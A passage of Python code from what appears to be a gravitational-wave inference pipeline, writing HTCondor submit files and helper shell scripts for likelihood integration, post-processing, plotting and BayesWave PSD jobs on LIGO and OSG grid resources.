f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
if condor_commands is not None:
for cmd, value in condor_commands.iteritems():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="target",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
